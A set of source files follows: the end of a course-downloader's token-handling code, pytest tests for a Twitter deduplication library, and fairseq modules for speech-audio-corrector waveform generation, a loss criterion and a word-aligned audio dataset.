'chapter_url' : chapter_url,
'lectures' : self._extract_lectures(lectures)
})
acloud = self._extract_course_information(acloud)
if not course:
if response.headers.get('x-amzn-ErrorType'):
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Authorization error : it seems your authorization token is expired.\n")
sys.stdout.write(fc + sd + "[" + fm + sb + "i" + fc + sd + "] : " + fg + sb + "Login again & copy Request headers for a single request to file..\n")
sys.exit(0)
# with open("course.json", "w") as f:
# json.dump(acloud, f, indent=4)
# f.close()
# exit(0)
return acloud
``` |
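A standalone sketch of the token lookup `_extract_cookie_string` performs on pasted request headers; the header text and the simplified pattern below are illustrative, not the exact regex used above.
```python
import re

raw_headers = "GET /graphql HTTP/1.1\nAuthorization: Bearer abc.def.ghi \nAccept: */*"
mobj = re.search(r"(?is)Authorization:\s*Bearer\s*(?P<access_token>\S+)", raw_headers)
if mobj:
    print(mobj.group("access_token"))  # -> abc.def.ghi
```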
{
"source": "jonohill/twitter-dedupe",
"score": 2
} |
#### File: twitterdedupe/tests/test_get_my_unique.py
```python
import pytest
from twitterdedupe.tests.helpers import (
cache,
MockStatus,
MockAPI,
nonetwork_expand_fn
)
@pytest.fixture
def meth():
from twitterdedupe import get_my_unique_statuses
return get_my_unique_statuses
@pytest.fixture
def one_unique_timeline():
timeline = [
MockStatus(
"hitchhikers",
44,
"Most definitely not the question",
"http://www.chrisheisel.com/?wpsrc=fol_tw"
)
]
return timeline
@pytest.fixture
def three_timeline():
timeline = [
MockStatus(
"hitchhikers",
44,
"Most definitely not the question",
"http://www.chrisheisel.com/?wpsrc=fol_tw"
),
MockStatus(
"hitchhikers",
45,
"Most definitely not the question but it is a dupe!",
"http://www.chrisheisel.com/?wpsrc=fol_tw"
),
MockStatus(
"hitchhikers",
46,
"No links this time",
),
MockStatus(
"non-hitchhikers",
3,
"No links this time",
)
]
return timeline
def test_empty_timeline(meth, cache, nonetwork_expand_fn):
api = MockAPI("cmheisel", [])
result = meth(api, 1, cache, expand_fn=nonetwork_expand_fn)
assert len(result) == 0
def test_one_unique_timeline(meth, cache,
nonetwork_expand_fn, one_unique_timeline):
api = MockAPI("cmheisel", one_unique_timeline)
result = meth(api, 1, cache, expand_fn=nonetwork_expand_fn)
assert len(result) == 1
def test_three_timeline(meth, cache,
nonetwork_expand_fn, three_timeline):
api = MockAPI("cmheisel", three_timeline)
result = meth(api, 1, cache, expand_fn=nonetwork_expand_fn)
assert len(result) == 3
``` |
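The tests above expect a status to be dropped when it repeats an already-seen expanded link. A rough sketch of that behaviour, written as an assumption about what `get_my_unique_statuses` does (the `url` attribute and the cache's `get`/`set` interface are guesses, not the library's actual API):
```python
def unique_statuses(timeline, cache, expand_fn):
    """Keep the first status per expanded link; statuses without links always pass."""
    unique = []
    for status in timeline:
        url = getattr(status, "url", None)  # hypothetical attribute name
        if url is None:
            unique.append(status)
            continue
        key = expand_fn(url)
        if cache.get(key) is None:
            cache.set(key, True)
            unique.append(status)
    return unique
```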
{
"source": "jonojace/fairseq",
"score": 2
} |
#### File: examples/speech_audio_corrector/generate_waveform_sac.py
```python
import logging
import matplotlib.pyplot as plt
import numpy as np
from pathlib import Path
import soundfile as sf
import sys
import torch
import torchaudio
import os
from fairseq import checkpoint_utils, options, tasks, utils
from fairseq.logging import progress_bar
from fairseq.tasks.text_to_speech import plot_tts_output
from fairseq.data.audio.text_to_speech_dataset import TextToSpeechDataset
logging.basicConfig()
logging.root.setLevel(logging.INFO)
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def make_parser():
parser = options.get_speech_generation_parser()
parser.add_argument("--dump-features", action="store_true")
parser.add_argument("--dump-waveforms", action="store_true")
parser.add_argument("--dump-attentions", action="store_true")
parser.add_argument("--dump-eos-probs", action="store_true")
parser.add_argument("--dump-plots", action="store_true")
parser.add_argument("--dump-target", action="store_true")
parser.add_argument("--output-sample-rate", default=22050, type=int)
parser.add_argument("--teacher-forcing", action="store_true")
parser.add_argument(
"--audio-format", type=str, default="wav", choices=["wav", "flac"]
)
parser.add_argument(
"--txt-file", type=str, default="",
help="path to txt file of utterances to generate."
)
parser.add_argument("--speechreps-add-mask-tokens", action="store_true")
parser.add_argument("--add-count-to-filename", action="store_true")
parser.add_argument("--use-external-speechreps", action="store_true",
help="Use this flag if you want to use speechreps from the external dataset to do inference.")
return parser
def sac_friendly_text(words_and_speechreps, incl_codes=False,
upper=False, wrap_speechreps_word=True, delimiter=" "):
"""
given
(how, None)
(you, None)
(doing, HUB2 HUB35...)
generate a text of following format
"how are <you-2,35,35,33>"
"""
rv = []
for word, speechreps in words_and_speechreps:
if speechreps is None:
rv.append(word)
else:
s = f"{word.upper() if upper else word}"
if incl_codes:
                # TODO finish this: including the codes currently breaks soundfile,
                # which cannot write such long filenames to disk
                raise NotImplementedError
                codes_str = "-".join(str(sr) for sr in speechreps)
                s += f"-{codes_str}"
if wrap_speechreps_word:
s = f"<{s}>"
rv.append(s)
return delimiter.join(rv)
def strip_pointy_brackets(s):
return "".join(c for c in s if c not in ["<", ">"])
def postprocess_results(
dataset: TextToSpeechDataset, sample, hypos, resample_fn, dump_target, sort_by_text=True
):
def to_np(x):
return None if x is None else x.detach().cpu().numpy()
if sample["id"] is not None:
sample_ids = [dataset.ids[i] for i in sample["id"].tolist()]
else:
sample_ids = [None for _ in hypos]
texts = sample["raw_texts"]
attns = [to_np(hypo["attn"]) for hypo in hypos]
eos_probs = [to_np(hypo.get("eos_prob", None)) for hypo in hypos]
feat_preds = [to_np(hypo["feature"]) for hypo in hypos]
wave_preds = [to_np(resample_fn(h["waveform"])) for h in hypos]
if sample["words_and_speechreps"] is not None:
sac_friendly_texts = [sac_friendly_text(x, incl_codes=False) for x in sample["words_and_speechreps"]]
else:
sac_friendly_texts = [None for _ in hypos]
if dump_target:
feat_targs = [to_np(hypo["targ_feature"]) for hypo in hypos]
wave_targs = [to_np(resample_fn(h["targ_waveform"])) for h in hypos]
else:
feat_targs = [None for _ in hypos]
wave_targs = [None for _ in hypos]
# sort the samples in batch by the text seq
zipped = list(zip(sample_ids, texts, attns, eos_probs, feat_preds, wave_preds,
feat_targs, wave_targs, sac_friendly_texts))
# print("zipped text before sort", [tup[1] for tup in zipped])
if sort_by_text:
# strip_pointy_brackets so that the brackets are not considered when sorting
zipped = sorted(zipped, key=lambda tup: strip_pointy_brackets(tup[1]))
# print("zipped after sort", zipped)
# print("zipped after sort", list(zipped))
# print("zipped text after sort", [tup[1] for tup in zipped])
return zipped
def dedupe_adjacent(iterable, token_to_dedupe="<mask>"):
prev = object()
for item in iterable:
if item != token_to_dedupe:
prev = item
yield item
elif item != prev: # here item is equal to token_to_dedupe
prev = item
yield item
def dump_result(
is_na_model,
args,
count,
vocoder,
add_count_to_filename,
sample_id,
text,
attn,
eos_prob,
feat_pred,
wave_pred,
feat_targ,
wave_targ,
sac_friendly_text,
):
# add useful info to filename
if sample_id and sac_friendly_text:
filename_no_ext = f"{sample_id}-{sac_friendly_text}"
else:
if add_count_to_filename:
filename_no_ext = f"{count}-{text}"
else:
filename_no_ext = f"{text}"
sample_rate = args.output_sample_rate
out_root = Path(args.results_path)
if args.dump_features:
feat_dir = out_root / "feat"
feat_dir.mkdir(exist_ok=True, parents=True)
np.save(feat_dir / f"{filename_no_ext}.npy", feat_pred)
if args.dump_target:
feat_tgt_dir = out_root / "feat_tgt"
feat_tgt_dir.mkdir(exist_ok=True, parents=True)
np.save(feat_tgt_dir / f"{filename_no_ext}.npy", feat_targ)
if args.dump_attentions:
attn_dir = out_root / "attn"
attn_dir.mkdir(exist_ok=True, parents=True)
np.save(attn_dir / f"{filename_no_ext}.npy", attn.numpy())
if args.dump_eos_probs and not is_na_model:
eos_dir = out_root / "eos"
eos_dir.mkdir(exist_ok=True, parents=True)
np.save(eos_dir / f"{filename_no_ext}.npy", eos_prob)
if args.dump_plots:
images = [feat_pred.T] if is_na_model else [feat_pred.T, attn]
names = ["output"] if is_na_model else ["output", "alignment"]
if feat_targ is not None:
images = [feat_targ.T] + images
names = [f"target (idx={filename_no_ext})"] + names
if is_na_model:
plot_tts_output(images, names, attn, "alignment", suptitle=sac_friendly_text)
else:
plot_tts_output(images, names, eos_prob, "eos prob", suptitle=sac_friendly_text)
plot_dir = out_root / "plot"
plot_dir.mkdir(exist_ok=True, parents=True)
plt.savefig(plot_dir / f"{filename_no_ext}.png")
plt.close()
if args.dump_waveforms:
ext = args.audio_format
if wave_pred is not None:
wav_dir = out_root / f"{ext}_{sample_rate}hz_{vocoder}"
wav_dir.mkdir(exist_ok=True, parents=True)
sf.write(wav_dir / f"{filename_no_ext}.{ext}", wave_pred, sample_rate)
if args.dump_target and wave_targ is not None:
wav_tgt_dir = out_root / f"{ext}_{sample_rate}hz_{vocoder}_tgt"
wav_tgt_dir.mkdir(exist_ok=True, parents=True)
sf.write(wav_tgt_dir / f"{filename_no_ext}.{ext}", wave_targ, sample_rate)
def filter_utts_whose_words_do_not_have_speechreps(
utts,
dataset,
use_external_speechreps=False,
ignore_list=[]
):
missing_words = set()
new_utts = []
# print("DEBUG", list(dataset.word2speechreps.keys()))
for utt in utts:
for token in utt.split(" "):
if token.startswith("<") and token.endswith(">"):
word = token.lstrip("<").rstrip(">")
else:
word = token
w2sr = dataset.ext_word2speechreps if use_external_speechreps else dataset.word2speechreps
if word not in w2sr and word not in ignore_list:
missing_words.add(word)
break
else:
new_utts.append(utt)
if len(missing_words) > 0:
print(f"\nWARNING {len(missing_words)} (out of {len(utts)}) utts left out from inference. Words not in dataset.word2speechreps are:", missing_words)
# print(f"DEBUG", len(utts), len(new_utts))
return new_utts
def main(args):
assert(args.dump_features or args.dump_waveforms or args.dump_attentions
or args.dump_eos_probs or args.dump_plots)
if args.max_tokens is None and args.batch_size is None:
args.max_tokens = 8000
logger.info(args)
# setup model and task
use_cuda = torch.cuda.is_available() and not args.cpu
task = tasks.setup_task(args)
models, saved_cfg, task = checkpoint_utils.load_model_ensemble_and_task(
[args.path],
task=task,
)
model = models[0].cuda() if use_cuda else models[0]
# use the original n_frames_per_step
task.args.n_frames_per_step = saved_cfg.task.n_frames_per_step
# if args.txt_file:
# # TODO combine train dev and test so we have more options of word-aligned speech reps to choose from?
# task.load_dataset(args.gen_subset, task_cfg=saved_cfg.task)
# else:
# task.load_dataset(args.gen_subset, task_cfg=saved_cfg.task)
task.load_dataset(args.gen_subset, task_cfg=saved_cfg.task)
data_cfg = task.data_cfg
# set resampling function for post processing of model outputs
sample_rate = data_cfg.config.get("features", {}).get("sample_rate", 22050)
resample_fn = {
False: lambda x: x,
True: lambda x: torchaudio.sox_effects.apply_effects_tensor(
x.detach().cpu().unsqueeze(0), sample_rate,
[['rate', str(args.output_sample_rate)]]
)[0].squeeze(0)
}.get(args.output_sample_rate != sample_rate)
if args.output_sample_rate != sample_rate:
logger.info(f"resampling to {args.output_sample_rate}Hz")
generator = task.build_generator([model], args)
dataset = task.dataset(args.gen_subset)
if args.txt_file:
# generate test sentences in txt file (WARNING: do not have underlying ground truth audio for obj eval!)
with open(args.txt_file, 'r') as f:
test_utts = [l.rstrip("\n") for l in f.readlines() if l != "\n" and not l.startswith("#")]
print("test_utts", test_utts)
print("args.use_external_speechreps", args.use_external_speechreps)
test_utts = filter_utts_whose_words_do_not_have_speechreps(
test_utts,
dataset,
use_external_speechreps=args.use_external_speechreps,
ignore_list=["how", "is", "pronounced"]
)
# create mini-batches with given size constraints
itr = dataset.batch_from_utts(
test_utts,
dataset,
batch_size=args.batch_size,
use_external_speechreps=args.use_external_speechreps
)
else:
# generate from a subset of corpus (usually test, but can specify train or dev)
itr = task.get_batch_iterator(
dataset=dataset,
max_tokens=args.max_tokens,
max_sentences=args.batch_size,
max_positions=(sys.maxsize, sys.maxsize),
ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,
required_batch_size_multiple=args.required_batch_size_multiple,
num_shards=args.num_shards,
shard_id=args.shard_id,
num_workers=args.num_workers,
data_buffer_size=args.data_buffer_size,
).next_epoch_itr(shuffle=False)
# output to different directory if using external speechreps
if args.use_external_speechreps:
args.results_path = os.path.join(args.results_path, 'ext_speechreps')
Path(args.results_path).mkdir(exist_ok=True, parents=True)
is_na_model = getattr(model, "NON_AUTOREGRESSIVE", False)
vocoder = task.args.vocoder
count = 0
with progress_bar.build_progress_bar(args, itr) as t:
for sample in t:
# print("DEBUG", sample["src_texts"])
sample = utils.move_to_cuda(sample) if use_cuda else sample
hypos = generator.generate(model, sample, has_targ=args.dump_target)
for result in postprocess_results(
dataset, sample, hypos, resample_fn, args.dump_target,
sort_by_text=True if args.txt_file else False,
):
count += 1
dump_result(is_na_model, args, count, vocoder, args.add_count_to_filename, *result)
print(f"*** Finished SAC generation of {count} items ***")
def cli_main():
parser = make_parser()
args = options.parse_args_and_arch(parser)
main(args)
if __name__ == "__main__":
cli_main()
```
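A quick standalone illustration of the filename-friendly strings produced by `sac_friendly_text` with its defaults: words that carried speech codes are wrapped in pointy brackets, plain words pass through. The word/code pairs below are made up.
```python
pairs = [("how", None), ("are", None), ("you", ["HUB2", "HUB35"])]
print(" ".join(w if codes is None else f"<{w}>" for w, codes in pairs))
# -> how are <you>
```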
#### File: fairseq/criterions/sac_loss.py
```python
import logging
from typing import Any, Dict, List
from functools import lru_cache
from dataclasses import dataclass, field
import torch
from omegaconf import II
from fairseq import metrics, utils
from fairseq.criterions import FairseqCriterion, register_criterion
from fairseq.dataclass import FairseqDataclass
from fairseq.data.data_utils import lengths_to_mask
import torch.nn.functional as F
from fairseq.criterions.tacotron2_loss import (
Tacotron2CriterionConfig,
Tacotron2Criterion,
GuidedAttentionLoss,
)
logger = logging.getLogger(__name__)
@dataclass
class SACCriterionConfig(Tacotron2CriterionConfig):
pass
@register_criterion("sac_tts", dataclass=SACCriterionConfig)
class SACCriterion(Tacotron2Criterion):
def forward(self, model, sample, reduction="mean"):
bsz, max_len, _ = sample["target"].size()
feat_tgt = sample["target"]
feat_len = sample["target_lengths"].view(bsz, 1).expand(-1, max_len)
eos_tgt = torch.arange(max_len).to(sample["target"].device)
eos_tgt = eos_tgt.view(1, max_len).expand(bsz, -1)
eos_tgt = (eos_tgt == (feat_len - 1)).float()
src_tokens = sample["net_input"]["src_tokens"]
src_word_pos = sample["net_input"]["src_word_pos"]
src_segments = sample["net_input"]["src_segments"]
src_lens = sample["net_input"]["src_lengths"]
tgt_lens = sample["target_lengths"]
feat_out, eos_out, extra = model(
src_tokens=src_tokens,
src_word_pos=src_word_pos,
src_segments=src_segments,
src_lengths=src_lens,
prev_output_tokens=sample["net_input"]["prev_output_tokens"],
incremental_state=None,
target_lengths=tgt_lens,
speaker=sample["speaker"]
)
l1_loss, mse_loss, eos_loss = self.compute_loss(
extra["feature_out"], feat_out, eos_out, feat_tgt, eos_tgt,
tgt_lens, reduction,
)
attn_loss = torch.tensor(0.).type_as(l1_loss)
if self.guided_attn is not None:
attn_loss = self.guided_attn(extra['attn'], src_lens, tgt_lens, reduction)
ctc_loss = torch.tensor(0.).type_as(l1_loss)
if self.ctc_weight > 0.:
net_output = (feat_out, eos_out, extra)
lprobs = model.get_normalized_probs(net_output, log_probs=True)
lprobs = lprobs.transpose(0, 1) # T x B x C
src_mask = lengths_to_mask(src_lens)
src_tokens_flat = src_tokens.masked_select(src_mask)
ctc_loss = F.ctc_loss(
lprobs, src_tokens_flat, tgt_lens, src_lens,
reduction=reduction, zero_infinity=True
) * self.ctc_weight
loss = l1_loss + mse_loss + eos_loss + attn_loss + ctc_loss
sample_size = sample["nsentences"] if self.sentence_avg \
else sample["ntokens"]
logging_output = {
"loss": utils.item(loss.data),
"ntokens": sample["ntokens"],
"nsentences": sample["nsentences"],
"sample_size": sample_size,
"l1_loss": utils.item(l1_loss.data),
"mse_loss": utils.item(mse_loss.data),
"eos_loss": utils.item(eos_loss.data),
"attn_loss": utils.item(attn_loss.data),
"ctc_loss": utils.item(ctc_loss.data),
"seg_emb_alpha": utils.item(model.encoder.seg_emb_alpha),
"pos_emb_alpha": utils.item(model.encoder.pos_emb_alpha),
}
if not model.encoder.no_word_pos:
logging_output["word_pos_emb_alpha"] = utils.item(model.encoder.word_pos_emb_alpha),
return loss, sample_size, logging_output
@classmethod
def reduce_metrics(cls, logging_outputs: List[Dict[str, Any]]) -> None:
ns = [log.get("sample_size", 0) for log in logging_outputs]
ntot = sum(ns)
ws = [n / (ntot + 1e-8) for n in ns]
        # log these metrics as sample-size-weighted averages across the logged batches
for key in ["loss", "l1_loss", "mse_loss", "eos_loss", "attn_loss", "ctc_loss"]:
vals = [log.get(key, 0) for log in logging_outputs]
val = sum(val * w for val, w in zip(vals, ws))
metrics.log_scalar(key, val, ntot, round=3)
# log other metrics
seg_emb_alpha = logging_outputs[0].get("seg_emb_alpha", 0)
pos_emb_alpha = logging_outputs[0].get("pos_emb_alpha", 0)
metrics.log_scalar("seg_emb_alpha", seg_emb_alpha, 0)
metrics.log_scalar("pos_emb_alpha", pos_emb_alpha, 0)
# inference metrics
if "targ_frames" not in logging_outputs[0]:
return
n = sum(log.get("targ_frames", 0) for log in logging_outputs)
for key, new_key in [
("mcd_loss", "mcd_loss"),
("pred_frames", "pred_ratio"),
("nins", "ins_rate"),
("ndel", "del_rate"),
]:
val = sum(log.get(key, 0) for log in logging_outputs)
metrics.log_scalar(new_key, val / n, n, round=3)
```
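A tiny numeric check of the reduction in `reduce_metrics` above: per-batch losses are combined as a sample-size-weighted average rather than a plain mean. The numbers are arbitrary.
```python
ns = [10, 30]                   # sample sizes from two logged batches
losses = [2.0, 1.0]             # their reported losses
ws = [n / sum(ns) for n in ns]  # -> [0.25, 0.75]
print(sum(l * w for l, w in zip(losses, ws)))  # -> 1.25 (a plain mean would give 1.5)
```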
#### File: data/audio/word_aligned_audio_dataset.py
```python
from fairseq.data import FairseqDataset
# from .. import FairseqDataset
import logging
import numpy as np
import os
import pyarrow
import re
import torch
import random
from collections import defaultdict
from tqdm import tqdm
logger = logging.getLogger(__name__)
def verify_size(reps):
# check dimensions and change them if necessary
if reps.dim() == 3:
# we assume (batch, timesteps, hidden_size)
reps = reps.squeeze(0) # squeeze away batch dimension
assert reps.dim() == 2
elif reps.dim() == 2:
pass # all is good!
else:
raise ValueError("speech representations have an incorrect number of dimensions")
return reps
def get_timesteps_from_filename(filename):
# grep out length
matches = re.findall(r'len(\d+)', filename)
assert len(matches) == 1
return matches[0]
def random_sampling(a_list, num_samples):
if num_samples >= len(a_list):
return a_list
else:
return random.sample(a_list, num_samples)
def zeropad_to_len(t, targ_len):
len_diff = targ_len - t.size(0)
if t.dim() == 1:
zero_padded_t = torch.cat([t, t.new_zeros(len_diff)])
elif t.dim() == 2:
zero_padded_t = torch.cat([t, t.new_zeros(len_diff, t.size(1))])
else:
raise ValueError
return zero_padded_t, len_diff
class WordAlignedAudioDataset(FairseqDataset):
"""
A dataset that maps between word-tokens in a corpus to their speech representations.
Speech aligned at the word-level can be represented as any two dimensional matrix of shape (timesteps, dimensions).
E.g.:
- mel-spectrograms (timesteps, number of mel bins)
- wav2vec2.0 representations (timesteps, hidden size of wav2vec2.0 representations)
The dataset is structured as a key-value mapping:
- key: An index from 0 to the total number of tokens in a corpus.
Subsequently the index uniquely identifies any token in the corpus
- value: A dictionary associated with that token. That contains:
- path to a token's speech representations
- the token's graphemes
This dataset also contains a mapping between a word in its graphemic form and its examples in the corpus.
This is used to speed up the retrieval of positive and negative examples for triplet loss/contrastive training.
The data_path is the path to the speech corpus rearranged and cut at the word-level,
it should have the following structure (please refer to fairseq/examples/lexicon_learner/wordalign_speechreps.py):
- data_path
- word1
- word1_LJ010-0292_001.pt
- word1_LJ010-0292_002.pt
- ...
- word2
- word2_LJ001-0012_001.pt
- word2_LJ002-0024_001.pt
- ...
- ...
- word1, word2, ... subfolders refer to a particular wordtype in the corpus.
- .pt files contain speech representations that map to a particular example of a wordtype.
It is named as:
<wordtype>_<utt id>_occ<numbered occurrence in the utterance>_len<num of timesteps in sequence>.pt
Training set:
Validation set:
Seen:
Unseen:
"""
def __init__(
self,
data_path,
split,
save_dir,
cache_all_data=True, # warning doing so with large datasets could lead to OOM!
max_train_wordtypes=None, # leave as None to use as many wordtypes as possible for training
max_train_examples_per_wordtype=None, # leave as None to use all examples for each wordtype
min_train_examples_per_wordtype=2,
valid_seen_wordtypes=100, # how many wordtypes seen during training to include in validation
valid_unseen_wordtypes=100, # how many wordtypes to leave out of training and include in validation
valid_examples_per_wordtype=25, # for valid-seen and valid-unseen
randomise_wordtypes=True,
random_seed=1337,
wordtypes_to_ignore=('SIL', '<unk>'),
debug_only_include_words_beginning_with=None,
padding_index_offset=1,
):
super().__init__()
logger.info(f"Creating dataset...")
# valid-seen is by definition a subset of the training dataset
if max_train_wordtypes is not None and max_train_wordtypes < valid_seen_wordtypes:
raise ValueError(f"max_train_wordtypes ({max_train_wordtypes}) < valid_seen_wordtypes ({valid_seen_wordtypes})")
# need at least 2 examples for training and 2 for validation (2+2=4)
# so that we can pull at least 1 positive example during training and validation for a wordtype
assert min_train_examples_per_wordtype >= 2
assert valid_examples_per_wordtype >= 2
min_examples_per_wordtype = min_train_examples_per_wordtype + valid_examples_per_wordtype
# if max_train_examples_per_wordtype is not None:
# assert max_train_examples_per_wordtype >= min_examples_per_wordtype, f"At least {min_examples_per_wordtype} examples needed to draw a positive example for a given anchor during either training or validation. (max_train_examples_per_wordtype={max_train_examples_per_wordtype})"
# check data split
if split == "test":
raise NotImplementedError
if split not in ["train", "valid-seen", "valid-unseen"]:
raise ValueError(f"'{split}' not a correct dataset split.")
################################################################################################################
### Open main data folder and load word-aligned speech reps for all words in the vocab
self.examples = [] # each example is a filepath to some reps, or the representations themselves
self.sizes = []
all_indices = []
self.cache_all_data = cache_all_data
self.padding_index_offset = padding_index_offset
# create a mapping between a wordtype and a list of positive examples of that wordtype
# this data structure is used to quickly find positive and negative examples for a particular word token
self.wordtype2indices = defaultdict(set)
# load all subfolders (each of which correspond to a unique wordtype)
all_subfolders = sorted(os.listdir(data_path))
# (for debugging) optionally only include wordtypes that start with a certain letter to speed up debugging
if debug_only_include_words_beginning_with is not None:
all_subfolders = [w for w in all_subfolders if w.startswith(debug_only_include_words_beginning_with)]
# optionally randomise the order so its not alphabetical
if randomise_wordtypes:
random.seed(random_seed)
random.shuffle(all_subfolders)
# skip wordtypes we wish to ignore
for w in wordtypes_to_ignore:
if w in all_subfolders:
all_subfolders.remove(w)
# skip any wordtypes from consideration if they do not have enough examples
skipped_wordtypes = []
logger.info(f"Skipping wordtypes that do not have enough examples...")
for wordtype in tqdm(all_subfolders, unit='wordtype'):
all_wordtoken_files = os.listdir(os.path.join(data_path, wordtype))
if len(all_wordtoken_files) < min_examples_per_wordtype:
skipped_wordtypes.append(wordtype)
for w in skipped_wordtypes:
all_subfolders.remove(w)
logger.info(f"Did not include {len(skipped_wordtypes)} wordtypes because they have fewer than {min_examples_per_wordtype} examples.")
# calculate start and end wordtype indices depending on the dataset split/split subset
if split == "train":
start_wordtype_idx = 0
if max_train_wordtypes is None:
end_wordtype_idx = len(all_subfolders) - valid_unseen_wordtypes
else:
if len(all_subfolders) >= max_train_wordtypes + valid_unseen_wordtypes:
end_wordtype_idx = max_train_wordtypes
else:
end_wordtype_idx = len(all_subfolders) - valid_unseen_wordtypes
elif split == "valid-seen":
start_wordtype_idx = 0
end_wordtype_idx = valid_seen_wordtypes
elif split == "valid-unseen":
start_wordtype_idx = -valid_unseen_wordtypes
end_wordtype_idx = None
else:
raise ValueError(f"'{split}' not a correct dataset split or dataset split subset.")
wordtype_to_incl_idx = 0
for wordtype in tqdm(all_subfolders[start_wordtype_idx:end_wordtype_idx], unit='wordtype'):
all_wordtoken_files = os.listdir(os.path.join(data_path, wordtype))
all_wordtoken_files = sorted(all_wordtoken_files) # ensure consistent ordering
# calculate start and end wordtoken indices depending on the dataset split/split subset
if split in ["train"]:
start_wordtoken_idx = 0
if max_train_examples_per_wordtype is None:
end_wordtoken_idx = len(all_wordtoken_files) - valid_examples_per_wordtype
else:
if len(all_wordtoken_files) >= max_train_examples_per_wordtype + valid_examples_per_wordtype:
end_wordtoken_idx = max_train_examples_per_wordtype
else:
end_wordtoken_idx = len(all_wordtoken_files) - valid_examples_per_wordtype
elif split in ["valid-seen", "valid-unseen"]:
start_wordtoken_idx = -valid_examples_per_wordtype
end_wordtoken_idx = None
else:
raise ValueError(f"'{split}' not a correct dataset split or dataset split subset.")
for wordtoken_file in all_wordtoken_files[start_wordtoken_idx:end_wordtoken_idx]:
filepath = os.path.join(data_path, wordtype, wordtoken_file)
# assign data associated with this word token / index
self.sizes.append(int(get_timesteps_from_filename(wordtoken_file)))
self.examples.append(filepath)
self.wordtype2indices[wordtype].add(wordtype_to_incl_idx)
all_indices.append(wordtype_to_incl_idx)
wordtype_to_incl_idx += 1
# cache all data in order to avoid accessing disk (locally or network) during training
# (more feasible when loading smaller data formats such as hubert codes vs full wav2vec2.0 vectors)
if self.cache_all_data:
self.cached_data = []
logger.info(f"Caching {len(self.examples)} examples.")
for fp in tqdm(self.examples):
self.cached_data.append(torch.load(fp).int() + self.padding_index_offset)
# Sanity checks
assert all_indices == list(range(len(self.examples)))
assert_msg = f"len(self.sizes)=={len(self.sizes)}, len(self.fnames)=={len(self.examples)}, sum(len(v) for v in " \
f"self.wordtype2indices.values())=={sum(len(v) for v in self.wordtype2indices.values())}, idx + 1=={wordtype_to_incl_idx} "
assert len(self.sizes) == len(self.examples) == sum(
len(v) for v in self.wordtype2indices.values()) == wordtype_to_incl_idx, assert_msg
# Assign object params
self.sizes = np.array(self.sizes, dtype=np.int64)
self.all_indices = set(all_indices)
# self.examples = pyarrow.array(self.examples) # uncomment to increase performance using pyarrow
# Print/save important information and stats about this dataset
logger.info(f"Finished creating word-aligned speech representations {split} dataset containing {len(self.wordtype2indices)} wordtypes "
f"and {len(self.examples)} word tokens in total.")
if split in ["valid-seen", "valid-unseen"]:
logger.info(f"{split} wordtypes are: {' '.join(self.wordtype2indices.keys())}")
self.save_wordtypes_to_disk(os.path.join(save_dir, f'{split}_{len(self.wordtype2indices.keys())}_wordtypes.csv'))
def __getitem__(self, anchor_index):
positive_index = list(self.get_positive_indices(anchor_index, num_examples=1))[0]
negative_index = list(self.get_negative_indices(anchor_index, num_examples=1))[0]
# load inputs
if self.cache_all_data:
anchor_in = self.cached_data[anchor_index]
positive_in = self.cached_data[positive_index]
negative_in = self.cached_data[negative_index]
else:
anchor_in = torch.load(self.examples[anchor_index]).int() + self.padding_index_offset # TODO warning this will not work with continuous reps!
positive_in = torch.load(self.examples[positive_index]).int() + self.padding_index_offset
negative_in = torch.load(self.examples[negative_index]).int() + self.padding_index_offset
# create tensors for indicating where we want to output targets
# e.g. 1 in timesteps where there is a grapheme and 0 where we do not have a grapheme
# (padding will be performed later by collater)
anchor_tgt = torch.ones(self.get_tgt_len(anchor_index, units="graphemes"), dtype=torch.int)
positive_tgt = torch.ones(self.get_tgt_len(positive_index, units="graphemes"), dtype=torch.int)
negative_tgt = torch.ones(self.get_tgt_len(negative_index, units="graphemes"), dtype=torch.int)
# print("debug", self.index2wordtype(anchor_index), anchor_tgt)
return {
"anchor_index": anchor_index,
"positive_index": positive_index,
"negative_index": negative_index,
"anchor_in": anchor_in, # e.g. speech reps of the anchor word
"positive_in": positive_in,
"negative_in": negative_in,
"anchor_tgt": anchor_tgt,
"positive_tgt": positive_tgt,
"negative_tgt": negative_tgt,
}
def get_tgt_len(self, wordtoken_index, units="graphemes"):
"""
return the length of some metadata related to the wordtype associated with a wordtoken
e.g. number of graphemes or phonemes of that wordtype
"""
if units == "graphemes":
tgt_len = len(self.index2wordtype(wordtoken_index))
elif units == "phones":
raise NotImplementedError
else:
raise ValueError
return tgt_len
def __len__(self):
return len(self.examples)
def index2wordtype(self, index):
filepath = self.examples[index]
wordtype = filepath.split('/')[-2]
return wordtype
def get_all_indices_for_wordtype(self, index):
wordtype = self.index2wordtype(index)
all_indices_for_wordtype = self.wordtype2indices[wordtype]
return all_indices_for_wordtype
def get_positive_indices(self, anchor_index, num_examples=1):
"""
For a given word token indicated by its index
return a set of the indices of positive examples (word tokens of the SAME wordtype but not the same token!)
"""
all_indices_for_wordtype = self.get_all_indices_for_wordtype(anchor_index)
positive_indices = all_indices_for_wordtype - {anchor_index}
return random_sampling(positive_indices, num_examples)
def get_negative_indices(self, anchor_index, num_examples=1):
"""
For a given word token indicated by its index
return a set of the indices of negative examples (word tokens of a DIFFERENT wordtype)
"""
all_indices_for_anchor = set(self.get_all_indices_for_wordtype(anchor_index))
negative_indices = self.all_indices - all_indices_for_anchor
return random_sampling(negative_indices, num_examples)
def collater(self, samples):
"""Merge a list of samples to form a mini-batch.
Args:
samples (List[dict]): samples to collate
Returns:
dict: a mini-batch suitable for forwarding with a Model
Acoustic lexicon learner specific:
- Zero pads anchor, positive, and negative inputs so that all items in the batch are the same size
"""
if len(samples) == 0:
return {}
# # get indices
# anchor_indices = torch.tensor([s["anchor_index"] for s in samples], dtype=torch.long)
# positive_indices = torch.tensor([s["positive_index"] for s in samples], dtype=torch.long)
# negative_indices = torch.tensor([s["negative_index"] for s in samples], dtype=torch.long)
# # get wordtypes just for anchor words
# anchor_wordtypes = [self.index2wordtype(idx) for idx in anchor_indices]
collated_inputs, in_lengths = self.collate_anchor_positive_negative_tensors(samples, feat_type='in')
collated_tgts, tgt_lengths = self.collate_anchor_positive_negative_tensors(samples, feat_type='tgt')
return {
"net_input": {
"src_tokens": collated_inputs,
"tgt_tokens": collated_tgts,
# "src_lengths": in_lengths,
"tgt_lengths": tgt_lengths,
},
"sample_size": in_lengths.sum().item(),
# "anchor_indices": anchor_indices,
# "positive_indices": positive_indices,
